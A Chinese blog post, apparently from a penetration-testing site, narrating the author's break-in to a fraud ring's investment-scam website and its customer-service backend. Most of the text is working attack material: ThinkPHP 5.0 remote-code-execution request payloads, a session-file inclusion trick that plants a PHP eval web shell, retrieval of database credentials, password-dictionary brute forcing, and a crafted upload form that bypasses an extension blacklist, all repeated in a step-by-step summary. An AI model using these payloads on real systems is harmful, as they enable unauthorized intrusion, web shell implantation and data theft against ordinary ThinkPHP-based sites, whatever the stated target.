深入诈骗团队

最近接到任务,调查一个诈骗团伙

上面有一个注册接口,直接先注册一个用户看看他们怎么诈骗的


好家伙,用户赚了8个亿,充值过的用户直呼内行。
这种站点一看就是那种诈骗团伙的杀猪盘,使用的那种tp5的框架一键搭建,方便又省事。后来根据报错信息的确是tp5.0.10的框架还开了debug模式,老杀猪盘了。

直接先用tp5rce打出phpinfo看

s=captcha
_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo


看来禁的函数比较多,这个时候用tp5的rce和写shell就比较困难,使用tp5日志包含和session包含来getshell就十分的方便。
日志包含还需要去找文件,我这里就直接是session包含来getshell
先通过设置session会话并传入一句话木马

?s=captcha
_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1


然后直接利用文件包含去包含session文件,tp5的session文件一般都是在/tmp下面,文件名为sess_sessionid

?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/tmp/sess_0mg7tlcvtmpv06cb732j47chb3&x=phpinfo();


这个时候我们就可以通过蚁剑连上shell了
需要把post传入的参数加在蚁剑连接的http body里面

连上后通过找到config下的database.php找到数据库密码账号

里面还有财务和技术的联系方式

直接登陆后台

好家伙,会员数30人,还有400多个机器人,金额在后台可以随便修改,太欺负人了。

打到这里总感觉信息还有点少啊,只有几个手机号,还有诈骗团伙的用来收款的银行卡,于是我又在运营站上面收集信息,原来客服的站点是其他服务器上面

通过目录扫描找到客服后台

试了一下弱口令,居然连admin这个用户都没有,这管理员意识还挺好的。
拿出我珍藏的字典爆破了一下,也没有发现存在的用户,我猜测他的用户名要么是电话号码,要么就是很长的用户名。
看来进后台是不行的了
然后通过ip反查发现也没有旁站,这个站点只有这个客服系统

扫了一下子域名也没有任何的发现
但是页面下面有一个Powered by 爱客服PHP在线客服系统,我觉得网上应该是有源码的,就去百度了一下,还真有源码。

网站是基于tp二次开发的,但是tp的rce已经没有了。
只有一步步的审计了
翻了很久在application/admin/controller/Event.php文件中找到了一处基于黑名单的上传函数uploadimg

定义一个上传函数uploadimg,然后定义一个变量name来获取到文件名,并用一个点以数组的方式隔开,而通过变量ext来获取到数组的第二个作为检测,当文件传入index.html,$ext=html,html在黑名单内所以就上传不成功,如果是文件传入index.jpg.php,$ext=jpg,jpg没有在黑名单,所以就可以上传成功。
根据tp的路由规则这个上传点应该在/admin/event/uploadimg这个位置

它这个页面没有上传点,只有自己构造一个上传页面了

<form action="http://ip/admin/event/uploadimg" method="post" enctype="multipart/form-data">
<label for="file">晨光客服上传</label>
<input type="file" name="editormd-image-file" id="editormd-image-file">
<input type="submit" name="submit" value="submit">
</form>

如果是上传index.php的话

的确是上传不成功的
如果是上传index.jpg.php

是可以上传成功的
拿下该客服站点

打包后台数据交给jc
在这里呼吁大家千万别相信什么刷单的,叫你充值就可以领钱的,都是假的,千万别想一夜暴富,占什么小便宜,天下没有免费的午餐。这里放几张图给大家看一下



这些诈骗团伙还理直气壮,有理有据,只会叫你越充越多,典型的杀猪盘

渗透总结:

1.注册一个测试账号

2通过报错,发现是tp5.0..10

3.使用TP5RCE查看phpinfo

s=captcha

post:

_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo

发现危险函数被禁用了

4.使用tp5日志包含和session包含来getshell

5.通过设置session会话并传入一句话木马

?s=captcha

post:

_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1

6.利用文件包含去包含session文件,tp5的session文件一般都是在/tmp下面,文件名为sess_sessionid

?s=captcha

post:

_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/tmp/sess_0mg7tlcvtmpv06cb732j47chb3&x=phpinfo();

7.通过蚁剑连上shell,需要把post传入的参数加在蚁剑连接的http body里面

8.通过后台源码查看发现客户服务后台。

9.发现服务后台为爱客服PHP在线客服系统,该系统存在文件上传漏洞

/admin/event/uploadimg


<form action="http://ip/admin/event/uploadimg" method="post" enctype="multipart/form-data">

<label for="file">晨光客服上传</label>

<input type="file" name="editormd-image-file" id="editormd-image-file">

<input type="submit" name="submit" value="submit">

</form>



posted @ 2021-12-27 10:37  渗透测试中心  阅读(1391)  评论(0编辑  收藏  举报